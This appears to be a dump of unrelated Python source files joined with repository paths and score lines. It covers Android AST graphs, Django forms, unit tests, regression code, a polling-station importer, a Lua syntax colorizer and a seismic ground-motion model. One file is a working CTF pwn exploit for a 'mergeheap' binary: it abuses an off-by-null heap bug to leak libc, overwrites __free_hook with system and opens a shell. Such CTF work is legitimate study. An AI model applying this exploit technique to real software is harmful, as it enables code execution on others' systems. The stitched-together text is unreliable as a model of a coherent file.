print('ERROR : in creat_ast()')
if __name__ == '__main__' :
targetList = get_targets(targetPath, targetExts)
for target in targetList:
a, d, dx = AnalyzeAPK(target)
t_count = 0
graphList = list()
for method in dx.get_methods():
m_ast = create_ast(method)
ap = ASTParser()
if m_ast is not None:
ap.load_ast(m_ast)
ap.parse_ast()
# for node in ap.parsedNodes:
# if 'APIName' == node.nodeInfo.type:
# pprint(node.nodeInfo)
# for edge in ap.parsedEdges:
# pprint(edge)
# ag = ASTGraph(ap.parsedNodes, ap.parsedEdges, config)
ag = ASTGraph(ap.parsedNodes, ap.parsedEdges)
ag.graph_initialize()
# encode_flag makes the index of edges meaningful
# ag.graph_initialize(encode_flag = True)
if ag.graph == None:
pass
else:
graphList.append(ag.graph)
save_pickle(resultPath + target.split('/')[1] + '.pickle', graphList)
| 2.0625 | 2 |
apps/oob/forms/task_forms.py | dbjennings/order-of-business | 0 | 12786507 | from django.forms import ModelForm, Form, CharField
from ..models import Project, Task
class TaskSearchForm(Form):
'''Form for the task search bar'''
query = CharField(max_length=100)
query.widget.attrs.update({'placeholder': 'Search all tasks...',
'class': 'form-control',})
class TaskForm(ModelForm):
class Meta:
model = Task
fields = ('title','body','project',)
def __init__(self, *args, **kwargs):
'''Uses the passed request to populate fields'''
if kwargs['request']:
self.request = kwargs.pop('request')
super(TaskForm,self).__init__(*args, **kwargs)
self.fields['project'].queryset = Project.objects.filter(user=self.request.user)
else:
super(TaskForm,self).__init__(*args, **kwargs)
self.fields['title'].widget.attrs.update({'class': 'form-control border border-dark',
'placeholder': 'Title',
'id': 'taskTitle',})
self.fields['body'].widget.attrs.update({'class': 'form-control border border-dark',
'placeholder': 'Body',
'id': 'taskBody',
'style': 'height: 8rem;',})
self.fields['project'].widget.attrs.update({'class': 'form-select border border-dark',
'placeholder': 'Project',
'id': 'taskProject',})
| 2.03125 | 2 |
tests/object/object.py | dem4ply/chibi | 0 | 12786508 | from unittest import TestCase
from chibi.object import Chibi_object
from chibi.object.descriptor import (
String, Dict, Tree_simple, Dict_defaults, Set
)
class Chibi_object_empty( Chibi_object ):
pass
class Chibi_object_with_descriptors( Chibi_object ):
name = String()
test_dict = Dict()
test_dict_default = Dict_defaults()
test_tree = Tree_simple()
test_set = Set()
class Chibi_object_with_defaults( Chibi_object ):
name = String( default='hello' )
test_dict_default = Dict_defaults( default='word' )
class Test_chibi_object( TestCase ):
def test_chibi_object_simple( self ):
obj = Chibi_object_empty()
self.assertIsInstance( obj, Chibi_object )
def test_with_descriptors( self ):
obj = Chibi_object_with_descriptors()
self.assertIsInstance( obj, Chibi_object )
self.assertEqual( obj.name, '' )
obj.name = 'hellooo'
self.assertEqual( obj.name, 'hellooo' )
self.assertIsNone( obj.test_dict )
obj.test_dict = { 'key': 'test' }
self.assertEqual( obj.test_dict, { 'key': 'test' } )
self.assertFalse( obj.test_dict_default )
data = obj.test_dict_default[ 'sadf' ]
self.assertIsNone( data )
self.assertFalse( obj.test_tree )
self.assertEqual( list( obj.test_tree.keys() ), [] )
self.assertEqual( len( obj.test_set ), 0 )
def test_with_descriptior_assing( self ):
obj = Chibi_object_with_descriptors( name='stuff', test_dict={} )
self.assertEqual( obj.test_dict, {} )
self.assertEqual( obj.name, 'stuff' )
obj.name = 'asdf'
self.assertEqual( obj.name, 'asdf' )
obj.test_dict['asdf'] = 123
self.assertEqual( obj.test_dict, { 'asdf': 123 } )
self.assertFalse( obj.test_tree )
obj.test_tree.a.b.c
self.assertEqual( obj.test_tree, { 'a': { 'b': { 'c': {} } } } )
obj.test_tree.a.rusky = 'RUSH B'
self.assertEqual( obj.test_tree, { 'a': { 'rusky': 'RUSH B',
'b': { 'c': {} } } } )
obj.test_dict_default[ 'qwer' ] = 'word'
self.assertIsNotNone( obj.test_dict_default[ 'qwer' ] )
self.assertEqual( obj.test_dict_default[ 'qwer' ], 'word' )
obj.test_set |= set( 'abc' )
self.assertEqual( len( obj.test_set ), 3 )
def test_with_defaults( self ):
obj = Chibi_object_with_defaults()
self.assertEqual( obj.name, 'hello' )
obj.name = 'zxcv'
self.assertEqual( obj.name, 'zxcv' )
word = obj.test_dict_default[ 'hello' ]
self.assertEqual( word, 'word' )
| 3.21875 | 3 |
txrest/__init__.py | dr4ke616/txREST | 0 | 12786509 | # -*- test-case-name: <INSERT_TEST_MODULE> -*-
# Copyright (c) 2014 <NAME> <<EMAIL>>
# See LICENSE for more details
"""
.. module:: controller
:platform: Linux
:synopsis: Just the __init__.py file
.. moduleauthor:: <NAME> <<EMAIL>>
"""
from txrest.managers.routing import RouteManager
route = RouteManager().route
| 1.617188 | 2 |
test/nose_test.py | fakeNetflix/uber-repo-doubles | 150 | 12786510 | <gh_stars>100-1000
import unittest
from nose.plugins import PluginTester
from doubles.nose import NoseIntegration
from doubles.instance_double import InstanceDouble
from doubles.targets.expectation_target import expect
def test_nose_plugin():
class TestNosePlugin(PluginTester, unittest.TestCase):
activate = '--with-doubles'
plugins = [NoseIntegration()]
def test_expect(self):
assert 'MockExpectationError' in self.output
assert 'FAILED (failures=1)' in self.output
assert 'Ran 2 tests' in self.output
def makeSuite(self):
class TestCase(unittest.TestCase):
def runTest(self):
subject = InstanceDouble('doubles.testing.User')
expect(subject).instance_method
def test2(self):
pass
return [TestCase('runTest'), TestCase('test2')]
result = unittest.TestResult()
TestNosePlugin('test_expect')(result)
assert result.wasSuccessful()
| 2.421875 | 2 |
ingest/datasets/cifar-10/DataReader.py | ivmfnal/striped | 1 | 12786511 | <gh_stars>1-10
import numpy as np
from BaseDataReader import BaseDataReader
from keras.datasets import cifar10
from keras.utils import to_categorical
class DataReader(BaseDataReader):
def __init__(self, file_path, schema):
(x_train, y_train), _ = cifar10.load_data()
self.x_train = np.asarray(x_train, dtype=np.float32)/256.
self.y_train = to_categorical(y_train, 10)
self.Schema = schema
def profile(self):
return None
def reopen(self):
pass
def nevents(self):
return len(self.x_train)
def branchSizeArray(self, bname):
pass
def stripesAndSizes(self, groups, bname, attr_name, attr_desc):
src = attr_desc["source"]
src_array = {'x': self.x_train, 'y': self.y_train }[src]
i = 0
for g in groups:
yield np.ascontiguousarray(src_array[i:i+g]), None
i += g
| 2.8125 | 3 |
REGRESSION/Ridge Regression/KERNEL RIDGE/kernelridge.py | algostatml/SUPERVISED-ML | 0 | 12786512 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 11 18:55:01 2019
@author: kenneth
"""
from __future__ import absolute_import
import numpy as np
from Utils.utils import EvalR
from Utils.Loss import loss
from Utils.kernels import Kernels
class kernelridge(EvalR, loss, Kernels):
def __init__(self, kernel = None, lamda = None):
super().__init__()
if not kernel:
kernel = 'linear'
self.kernel = kernel
else:
self.kernel = kernel
if not lamda:
lamda = 100000
self.lamda = lamda
else:
self.lamda = lamda
return
def kernelize(self, x1, x2):
'''
:params: x1: NxD
:params: x2: NxD
'''
if self.kernel == 'linear':
return Kernels.linear(x1, x2)
elif self.kernel == 'rbf':
return Kernels.rbf(x1, x2)
elif self.kernel == 'sigmoid':
return Kernels.sigmoid(x1, x2)
elif self.kernel == 'polynomial':
return Kernels.polynomial(x1, x2)
elif self.kernel == 'cosine':
return Kernels.cosine(x1, x2)
elif self.kernel == 'correlation':
return Kernels.correlation(x1, x2)
def fit(self, X, y):
'''
:param: X: NxD
:param: Dx1
'''
self.X = X
self.y = y
self.alpha = np.linalg.solve(self.kernelize(self.X, self.X) + self.lamda*np.eye(self.X.shape[0]), self.y)
return self
def predict(self, X):
'''
:param: X: NxD
:return type: Dx1 vector
'''
return np.dot((self.kernelize(self.X, X).T * self.y), self.alpha.T)
#%% Testing
from sklearn.datasets import load_boston
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import Normalizer, StandardScaler
X, y = load_boston().data, load_boston().target
X = StandardScaler().fit_transform(X)
X_train, X_test, Y_train, Y_test = train_test_split(X, y, test_size = .3)
kridge = kernelridge().fit(X_train, Y_train)
kridge.predict(X_test)
kridge.summary(X, Y_test, kridge.predict(X_test))
#%%
from sklearn.kernel_ridge import KernelRidge
clf = KernelRidge(alpha=1.0, kernel='linear')
clf.fit(X, y)
kridge.summary(X, Y_test, clf.predict(X_test))
| 2.578125 | 3 |
teamleader/__init__.py | rubenvdb/python-teamleader | 0 | 12786513 | <filename>teamleader/__init__.py
__prog__ = 'python-teamleader'
__version__ = u'1.2.1'
| 1.210938 | 1 |
polling_stations/apps/data_importers/management/commands/import_southwark.py | smsmith97/UK-Polling-Stations | 29 | 12786514 | from data_importers.management.commands import BaseXpressDemocracyClubCsvImporter
class Command(BaseXpressDemocracyClubCsvImporter):
council_id = "SWK"
addresses_name = "2021-04-13T12:22:55.056323/southwark_deduped.tsv"
stations_name = "2021-04-13T12:22:55.056323/southwark_deduped.tsv"
elections = ["2021-05-06"]
csv_delimiter = "\t"
csv_encoding = "windows-1252"
def address_record_to_dict(self, record):
uprn = record.property_urn.strip().lstrip("0")
if uprn in [
"200003422738", # FLAT 2, 29 RODNEY PLACE, LONDON
"200003422744", # FLAT 8, 29 RODNEY PLACE, LONDON
"200003422746", # FLAT 10, 29 RODNEY PLACE, LONDON
"200003422739", # FLAT 3, 29 RODNEY PLACE, LONDON
"200003422737", # FLAT 1, 29 RODNEY PLACE, LONDON
"200003422745", # FLAT 9, 29 RODNEY PLACE, LONDON
"200003422743", # FLAT 7, 29 RODNEY PLACE, LONDON
"200003422740", # FLAT 4, 29 RODNEY PLACE, LONDON
"200003422741", # FLAT 5, 29 RODNEY PLACE, LONDON
"200003422742", # FLAT 6, 29 RODNEY PLACE, LONDON
"200003380843", # SHEET METAL MUSIC LTD, 212 ILDERTON ROAD, LONDON
"10094086807", # APARTMENT 1, 346 ROTHERHITHE STREET, LONDON
"10093338854", # 73C 73 CAMBERWELL GROVE, LONDON
"10093338853", # 73B 73 CAMBERWELL GROVE, LONDON
"200003394858", # 17 LYNDHURST WAY, LONDON
"10094743403", # 88 HALF MOON LANE, LONDON
"10094743404", # 90 HALF MOON LANE, LONDON
"10094743401", # 84 HALF MOON LANE, LONDON
"10094743402", # 86 HALF MOON LANE, LONDON
"10090283768", # KILIMANJARO LIVE LTD, SECOND FLOOR NORTH 15 BERMONDSEY SQUARE, LONDON
"200003492155", # BELLENDEN PRIMARY SCHOOL BELLENDEN ROAD, LONDON
"10093341594", # FLAT 6 4 JAMAICA ROAD, LONDON
"10093341595", # FLAT 7 4 JAMAICA ROAD, LONDON
"10093339544", # LONDON HOUSING FOUNDATION LTD, GROUND FLOOR REAR TEMPUS WHARF 29 BERMONDSEY WALL WEST, LONDON
"200003468937", # GROUNDSMANS COTTAGE COLLEGE ROAD, LONDON
"10094086939", # FLAT 4B 98 EAST DULWICH ROAD, LONDON
"10091665680", # 23 CAMBERWELL GROVE, LONDON
"200003465665", # 120 WARNER ROAD, LONDON
"10093340214", # SPORTS DIRECT, 91 RYE LANE, LONDON
"10091665874", # FLAT A 156 LOWER ROAD, LONDON
]:
return None
if record.addressline6 in [
"SE5 0SY",
"SE15 5AD",
"SE1 2PS",
"SE5 7HY",
"SE15 6BJ",
"SE1 3UL",
"SE16 2QU",
"SE16 6AZ",
"SE1 2AD",
"SE15 2FF",
"SE1 0AA",
"SE1 0NS",
"SE15 3DN",
"SE5 0HB",
"SE15 2ND",
]:
return None
if record.addressline1 == "Excluding Third Floor and Fourth Floor":
return None
return super().address_record_to_dict(record)
| 2.09375 | 2 |
thortils/interactions.py | zkytony/thortils | 0 | 12786515 | def OpenObject(controller, objectId, openness=1.0):
return controller.step(action="OpenObject",
objectId=objectId,
openness=openness)
def CloseObject(controller, objectId):
return controller.step(action="CloseObject",
objectId=objectId)
def PickupObject(controller, objectId):
return controller.step(action="PickupObject",
objectId=objectId)
def DropObject(controller, objectId):
# Note: In version 3.3.4, this action takes no objectId argument.
return controller.step(action="DropHandObject")
def ToggleObjectOn(controller, objectId):
return controller.step(action="ToggleObjectOn",
objectId=objectId)
def ToggleObjectOff(controller, objectId):
return controller.step(action="ToggleObjectOff",
objectId=objectId)
def PushObjectLeft(controller, objectId, pushAngle="270", moveMagnitude="100"):
return controller.step(action="DirectionalPush",
objectId=objectId,
moveMagnitude=moveMagnitude,
pushAngle=pushAngle)
def PushObjectRight(controller, objectId, moveMagnitude="100", pushAngle="90"):
return controller.step(action="DirectionalPush",
objectId=objectId,
moveMagnitude=moveMagnitude,
pushAngle=pushAngle)
def PushObjectForward(controller, objectId, moveMagnitude="0", pushAngle="270"):
return controller.step(action="DirectionalPush",
objectId=objectId,
moveMagnitude=moveMagnitude,
pushAngle=pushAngle)
def PullObject(controller, objectId, moveMagnitude="100", pushAngle="180"):
return controller.step(action="DirectionalPush",
objectId=objectId,
moveMagnitude=moveMagnitude,
pushAngle=pushAngle)
def RemoveFromScene(controller, objectId):
return controller.step(action="RemoveFromScene",
objectId=objectId)
| 2.359375 | 2 |
buuctf/136-hwb_2019_mergeheap/exp.py | RoderickChan/ctf_tasks | 0 | 12786516 | #!/usr/bin/python3
from pwncli import *
cli_script()
p:tube = gift['io']
elf:ELF = gift['elf']
libc: ELF = gift['libc']
def add(length:int, data="a\n"):
assert length <= 0x400
p.sendlineafter(">>", "1")
p.sendlineafter("len:", str(length))
p.sendafter("content:", data)
def show(idx):
p.sendlineafter(">>", "2")
p.sendlineafter("idx:", str(idx))
m = p.recvline()
info(f"Get msg: {m}")
return m
def dele(idx):
p.sendlineafter(">>", "3")
p.sendlineafter("idx:", str(idx))
def merge(id1, id2):
p.sendlineafter(">>", "4")
p.sendlineafter("idx1:", str(id1))
p.sendlineafter("idx2:", str(id2))
def bye():
p.sendlineafter(">>", "5")
"""
1. off by null
"""
add(0x400) # 0
add(0xf0, 0xf0*"a") # 1
add(0x8, 0x8*"a") # 2
merge(0, 1) # 3 # 0x500
add(0xf8) # 4
merge(0, 1) # 5 0x500
add(0x10) # 6 gap
# free to get unsortedbin chunk
dele(3)
dele(4)
# off by null
merge(1, 2) # 3
dele(3)
add(0xf8, b"a"*0xf0+p64(0x600)) # 3
dele(5)
add(0x3f0) # 4
add(0xf0) # 5
m = show(3)
libc_abse_addr = u64_ex(m[:-1]) - 0x3ebca0
log_libc_base_addr(libc_abse_addr)
libc.address = libc_abse_addr
add(0xf0) # 7 overlapped with 3
dele(3)
dele(7)
add(0xf0, p64(libc.sym['__free_hook'])+b"\n") # 3
add(0xf0, "/bin/sh\x00\n") # 7
add(0xf0, p64(libc.sym['system'])+b"\n")
dele(7)
get_flag_when_get_shell(p)
p.interactive() | 2.125 | 2 |
src/urllib3/_compat.py | Stanislav1975/urllib3 | 2 | 12786517 | class RLock: # Python 3.6
# We shim out a context manager to be used as a compatibility layer
# if the system `threading` module doesn't have a real `RLock` available.
def __enter__(self) -> None:
pass
def __exit__(self, exc_type: object, exc_value: object, traceback: object) -> None:
pass
| 2.53125 | 3 |
leo/modes/lua.py | frakel/leo-editor | 0 | 12786518 | <gh_stars>0
# Leo colorizer control file for lua mode.
# This file is in the public domain.
# Properties for lua mode.
properties = {
"commentEnd": "]]",
"commentStart": "--[[",
"doubleBracketIndent": "true",
"indentCloseBrackets": "}",
"indentOpenBrackets": "{",
"lineComment": "--",
"lineUpClosingBracket": "true",
"wordBreakChars": ",+-=<>/?^&*",
}
# Attributes dict for lua_main ruleset.
lua_main_attributes_dict = {
"default": "null",
"digit_re": "[[:digit:]]*(\\.[[:digit:]]*)?([eE][+-]?[[:digit:]]*)?",
"escape": "",
"highlight_digits": "true",
"ignore_case": "false",
"no_word_sep": "_:.",
}
# Dictionary of attributes dictionaries for lua mode.
attributesDictDict = {
"lua_main": lua_main_attributes_dict,
}
# Keywords dict for lua_main ruleset.
lua_main_keywords_dict = {
"...": "keyword2",
"LUA_PATH": "keyword2",
"_ALERT": "keyword2",
"_ERRORMESSAGE": "keyword2",
"_G": "keyword2",
"_LOADED": "keyword2",
"_PROMPT": "keyword2",
"_REQUIREDNAME": "keyword2",
"_VERSION": "keyword2",
"__add": "keyword2",
"__call": "keyword2",
"__concat": "keyword2",
"__div": "keyword2",
"__eq": "keyword2",
"__fenv": "keyword2",
"__index": "keyword2",
"__le": "keyword2",
"__lt": "keyword2",
"__metatable": "keyword2",
"__mode": "keyword2",
"__mul": "keyword2",
"__newindex": "keyword2",
"__pow": "keyword2",
"__sub": "keyword2",
"__tostring": "keyword2",
"__unm": "keyword2",
"and": "keyword1",
"arg": "keyword2",
"assert": "keyword2",
"break": "keyword1",
"collectgarbage": "keyword2",
"coroutine.create": "keyword2",
"coroutine.resume": "keyword2",
"coroutine.status": "keyword2",
"coroutine.wrap": "keyword2",
"coroutine.yield": "keyword2",
"debug.debug": "keyword2",
"debug.gethook": "keyword2",
"debug.getinfo": "keyword2",
"debug.getlocal": "keyword2",
"debug.getupvalue": "keyword2",
"debug.sethook": "keyword2",
"debug.setlocal": "keyword2",
"debug.setupvalue": "keyword2",
"debug.traceback": "keyword2",
"do": "keyword1",
"dofile": "keyword2",
"else": "keyword1",
"elseif": "keyword1",
"end": "keyword1",
"error": "keyword2",
"false": "keyword3",
"for": "keyword1",
"function": "keyword1",
"gcinfo": "keyword2",
"getfenv": "keyword2",
"getmetatable": "keyword2",
"if": "keyword1",
"in": "keyword1",
"io.close": "keyword2",
"io.flush": "keyword2",
"io.input": "keyword2",
"io.lines": "keyword2",
"io.open": "keyword2",
"io.read": "keyword2",
"io.stderr": "keyword2",
"io.stdin": "keyword2",
"io.stdout": "keyword2",
"io.tmpfile": "keyword2",
"io.type": "keyword2",
"io.write": "keyword2",
"ipairs": "keyword2",
"loadfile": "keyword2",
"loadlib": "keyword2",
"loadstring": "keyword2",
"local": "keyword1",
"math.abs": "keyword2",
"math.acos": "keyword2",
"math.asin": "keyword2",
"math.atan": "keyword2",
"math.atan2": "keyword2",
"math.ceil": "keyword2",
"math.cos": "keyword2",
"math.deg": "keyword2",
"math.exp": "keyword2",
"math.floor": "keyword2",
"math.frexp": "keyword2",
"math.ldexp": "keyword2",
"math.log": "keyword2",
"math.log10": "keyword2",
"math.max": "keyword2",
"math.min": "keyword2",
"math.mod": "keyword2",
"math.pi": "keyword2",
"math.pow": "keyword2",
"math.rad": "keyword2",
"math.random": "keyword2",
"math.randomseed": "keyword2",
"math.sin": "keyword2",
"math.sqrt": "keyword2",
"math.tan": "keyword2",
"next": "keyword2",
"nil": "keyword3",
"not": "keyword1",
"or": "keyword1",
"os.clock": "keyword2",
"os.date": "keyword2",
"os.difftime": "keyword2",
"os.execute": "keyword2",
"os.exit": "keyword2",
"os.getenv": "keyword2",
"os.remove": "keyword2",
"os.rename": "keyword2",
"os.setlocale": "keyword2",
"os.time": "keyword2",
"os.tmpname": "keyword2",
"pairs": "keyword2",
"pcall": "keyword2",
"print": "keyword2",
"rawequal": "keyword2",
"rawget": "keyword2",
"rawset": "keyword2",
"repeat": "keyword1",
"require": "keyword2",
"return": "keyword1",
"setfenv": "keyword2",
"setmetatable": "keyword2",
"string.byte": "keyword2",
"string.char": "keyword2",
"string.dump": "keyword2",
"string.find": "keyword2",
"string.format": "keyword2",
"string.gfind": "keyword2",
"string.gsub": "keyword2",
"string.len": "keyword2",
"string.lower": "keyword2",
"string.rep": "keyword2",
"string.sub": "keyword2",
"string.upper": "keyword2",
"table.concat": "keyword2",
"table.foreach": "keyword2",
"table.foreachi": "keyword2",
"table.getn": "keyword2",
"table.insert": "keyword2",
"table.remove": "keyword2",
"table.setn": "keyword2",
"table.sort": "keyword2",
"then": "keyword1",
"tonumber": "keyword2",
"tostring": "keyword2",
"true": "keyword3",
"type": "keyword2",
"unpack": "keyword2",
"until": "keyword1",
"while": "keyword1",
"xpcall": "keyword2",
}
# Dictionary of keywords dictionaries for lua mode.
keywordsDictDict = {
"lua_main": lua_main_keywords_dict,
}
# Rules for lua_main ruleset.
def lua_rule0(colorer, s, i):
return colorer.match_span(s, i, kind="comment1", begin="--[[", end="]]",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def lua_rule1(colorer, s, i):
return colorer.match_eol_span(s, i, kind="comment1", seq="--",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="", exclude_match=False)
def lua_rule2(colorer, s, i):
return colorer.match_eol_span(s, i, kind="comment2", seq="#!",
at_line_start=True, at_whitespace_end=False, at_word_start=False,
delegate="", exclude_match=False)
def lua_rule3(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="\"", end="\"",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def lua_rule4(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="'", end="'",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def lua_rule5(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="[[", end="]]",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def lua_rule6(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="+",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule7(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="-",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule8(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="*",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule9(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="/",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule10(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="^",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule11(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="..",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule12(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="<=",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule13(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="<",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule14(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq=">=",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule15(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq=">",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule16(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="==",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule17(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="~=",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule18(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="=",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule19(colorer, s, i):
return colorer.match_mark_previous(s, i, kind="function", pattern="(",
at_line_start=False, at_whitespace_end=False, at_word_start=False, exclude_match=True)
def lua_rule20(colorer, s, i):
return colorer.match_mark_previous(s, i, kind="function", pattern="{",
at_line_start=False, at_whitespace_end=False, at_word_start=False, exclude_match=True)
def lua_rule21(colorer, s, i):
return colorer.match_mark_previous(s, i, kind="function", pattern="\"",
at_line_start=False, at_whitespace_end=False, at_word_start=False, exclude_match=True)
def lua_rule22(colorer, s, i):
return colorer.match_mark_previous(s, i, kind="function", pattern="'",
at_line_start=False, at_whitespace_end=False, at_word_start=False, exclude_match=True)
def lua_rule23(colorer, s, i):
return colorer.match_keywords(s, i)
# Rules dict for lua_main ruleset.
rulesDict1 = {
"\"": [lua_rule3,lua_rule21,],
"#": [lua_rule2,],
"'": [lua_rule4,lua_rule22,],
"(": [lua_rule19,],
"*": [lua_rule8,],
"+": [lua_rule6,],
"-": [lua_rule0,lua_rule1,lua_rule7,],
".": [lua_rule11,lua_rule23,],
"/": [lua_rule9,],
"0": [lua_rule23,],
"1": [lua_rule23,],
"2": [lua_rule23,],
"3": [lua_rule23,],
"4": [lua_rule23,],
"5": [lua_rule23,],
"6": [lua_rule23,],
"7": [lua_rule23,],
"8": [lua_rule23,],
"9": [lua_rule23,],
"<": [lua_rule12,lua_rule13,],
"=": [lua_rule16,lua_rule18,],
">": [lua_rule14,lua_rule15,],
"@": [lua_rule23,],
"A": [lua_rule23,],
"B": [lua_rule23,],
"C": [lua_rule23,],
"D": [lua_rule23,],
"E": [lua_rule23,],
"F": [lua_rule23,],
"G": [lua_rule23,],
"H": [lua_rule23,],
"I": [lua_rule23,],
"J": [lua_rule23,],
"K": [lua_rule23,],
"L": [lua_rule23,],
"M": [lua_rule23,],
"N": [lua_rule23,],
"O": [lua_rule23,],
"P": [lua_rule23,],
"Q": [lua_rule23,],
"R": [lua_rule23,],
"S": [lua_rule23,],
"T": [lua_rule23,],
"U": [lua_rule23,],
"V": [lua_rule23,],
"W": [lua_rule23,],
"X": [lua_rule23,],
"Y": [lua_rule23,],
"Z": [lua_rule23,],
"[": [lua_rule5,],
"^": [lua_rule10,],
"_": [lua_rule23,],
"a": [lua_rule23,],
"b": [lua_rule23,],
"c": [lua_rule23,],
"d": [lua_rule23,],
"e": [lua_rule23,],
"f": [lua_rule23,],
"g": [lua_rule23,],
"h": [lua_rule23,],
"i": [lua_rule23,],
"j": [lua_rule23,],
"k": [lua_rule23,],
"l": [lua_rule23,],
"m": [lua_rule23,],
"n": [lua_rule23,],
"o": [lua_rule23,],
"p": [lua_rule23,],
"q": [lua_rule23,],
"r": [lua_rule23,],
"s": [lua_rule23,],
"t": [lua_rule23,],
"u": [lua_rule23,],
"v": [lua_rule23,],
"w": [lua_rule23,],
"x": [lua_rule23,],
"y": [lua_rule23,],
"z": [lua_rule23,],
"{": [lua_rule20,],
"~": [lua_rule17,],
}
# x.rulesDictDict for lua mode.
rulesDictDict = {
"lua_main": rulesDict1,
}
# Import dict for lua mode.
importDict = {}
| 1.554688 | 2 |
test1/noding/noding.py | gr0mph/SpringChallenge2020 | 0 | 12786519 | import sys
sys.path.append('../../')
# Global variables
from test1.test_map import PACMAN_MAP
from test1.test_map import WIDTH
from test1.test_map import HEIGHT
# Class
from Challenge import Case
from Challenge import Node
from Challenge import Edge
from Challenge import BoardNodesAndEdges
# Global
# Method
from Challenge import t_update_width_and_height
import unittest
t_update_width_and_height(WIDTH, HEIGHT)
class _noding(unittest.TestCase):
def test_node(self):
kanban_node = BoardNodesAndEdges(None)
kanban_node.set_up(PACMAN_MAP)
# OK
for k_coord, n1 in kanban_node.nodes.items():
y1, x1 = k_coord
print(f'(x {x1} y {y1}) n {n1}')
print()
for e1 in kanban_node.edges:
k1_coord, k2_coord = e1.allays[0], e1.allays[-1]
y1, x1 = k1_coord.coord
y2, x2 = k2_coord.coord
print(f'(x {x1} y {y1}) (x {x2} y {y2})')
print(f'e {e1}')
print()
return
if __name__ == '__main__':
unittest.main()
| 2.484375 | 2 |
pygmm/akkar_sandikkaya_bommer_2014.py | nassermarafi/pygmm | 0 | 12786520 | <gh_stars>0
#!/usr/bin/env python3
# encoding: utf-8
from __future__ import division
import collections
import numpy as np
from . import model
__author__ = '<NAME>'
class AkkarSandikkayaBommer2014(model.Model):
"""Akkar, Sandikkaya, & Bommer (2014, :cite:`akkar14`) model.
"""
NAME = '<NAME>, & Bommer (2014)'
ABBREV = 'ASB13'
# Reference velocity (m/sec)
V_REF = 750.
# Load the coefficients for the model
COEFF = collections.OrderedDict(
(k, model.load_data_file(
'akkar-sandikkaya-bommer-2014-%s.csv' % k, 2))
for k in ['dist_jb', 'dist_hyp', 'dist_epi']
)
PERIODS = np.array(COEFF['dist_jb'].period)
INDICES_PSA = np.arange(2, 64)
INDEX_PGA = 0
INDEX_PGV = 1
PARAMS = [
model.NumericParameter('dist_jb', False, 0, 200),
model.NumericParameter('dist_epi', False, 0, 200),
model.NumericParameter('dist_hyp', False, 0, 200),
model.NumericParameter('mag', True, 4, 8),
model.NumericParameter('v_s30', True, 150, 1200),
model.CategoricalParameter('mechanism', True, ['SS', 'NS', 'RS']),
]
def __init__(self, **kwds):
"""Initialize the model.
The model is specified for three different distance metrics. However,
the implementation uses only one distance metric. They are used in
the following order:
1. `dist_jb`
2. `dist_hyp`
3. `dist_epi`
This order was selected based on evaluation of the total standard
deviation. To compute the response for differing metrics, call the
model multiple times with different keywords.
Keyword Args:
dist_jb (float): Joyner-Boore distance to the rupture plane
(:math:`R_\\text{JB}`, km)
dist_epi (float): Epicentral distance to the rupture plane
(:math:`R_\\text{epi}`, km)
dist_hyp (float): Hypocentral distance to the rupture plane
(:math:`R_\\text{hyp}`, km).
mag (float): moment magnitude of the event (:math:`M_w`)
mechanism (str): fault mechanism. Valid options: "SS", "NS", "RS".
v_s30 (float): time-averaged shear-wave velocity over the top 30 m
of the site (:math:`V_{s30}`, m/s).
"""
super(AkkarSandikkayaBommer2014, self).__init__(**kwds)
p = self.params
for k in self.COEFF:
if p[k] is not None:
dist = p[k]
c = self.COEFF[k]
break
else:
raise NotImplementedError("Must provide at least one distance "
"metric.")
# Compute the reference response
ln_resp_ref = (
c.a_1 + c.a_3 * (8.5 - p['mag']) ** 2 +
(c.a_4 + c.a_5 * (p['mag'] - c.c_1)) *
np.log(np.sqrt(dist ** 2 + c.a_6 ** 2))
)
mask = (p['mag'] <= c.c_1)
ln_resp_ref[mask] += (c.a_2 * (p['mag'] - c.c_1))[mask]
ln_resp_ref[~mask] += (c.a_7 * (p['mag'] - c.c_1))[~mask]
if p['mechanism'] == 'NS':
ln_resp_ref += c.a_8
